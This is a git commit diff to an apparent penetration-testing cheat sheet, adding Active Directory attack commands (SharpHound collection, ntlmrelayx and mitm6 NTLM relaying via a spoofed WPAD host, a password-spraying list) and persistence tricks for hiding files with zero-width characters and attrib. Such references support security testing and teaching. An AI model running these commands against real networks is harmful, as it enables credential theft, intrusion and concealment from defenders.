BloodHound ZIP + Zero Width space tip

This commit is contained in:
Swissky 2020-01-19 22:46:45 +01:00
parent 590b7681e4
commit be0397fa68
3 changed files with 19 additions and 4 deletions

View File

@ -77,6 +77,8 @@
SharpHound.exe (from resources/Ingestor)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb -SearchForest
SharpHound.exe --EncryptZip --ZipFilename export.zip
or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
or
@ -112,6 +114,7 @@
# -wh: Server hosting WPAD file (Attackers IP)
# -t: Target (You cannot relay credentials to the same device that youre spoofing)
# -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are :
- Password123, mimikatz
- P@ssw0rd01, Password123, mimikatz
- Welcome1/Welcome01
- $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
# spoofing WPAD and relaying NTLM credentials
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
or
http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
```
#### Drop the MIC

View File

@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder.
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
```bash
```powershell
## Do not remove. Generated from /etc/issue.conf by configure.
```
Hide in plain sight using zero width spaces in filename.
```powershell
touch $(echo -n 'index\u200D.php') index.php
```
Clear the last line of the history.
```bash

View File

@ -21,6 +21,12 @@
## Userland
Set a file as hidden
```powershell
attrib +h c:\autoexec.bat
```
### Registry
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.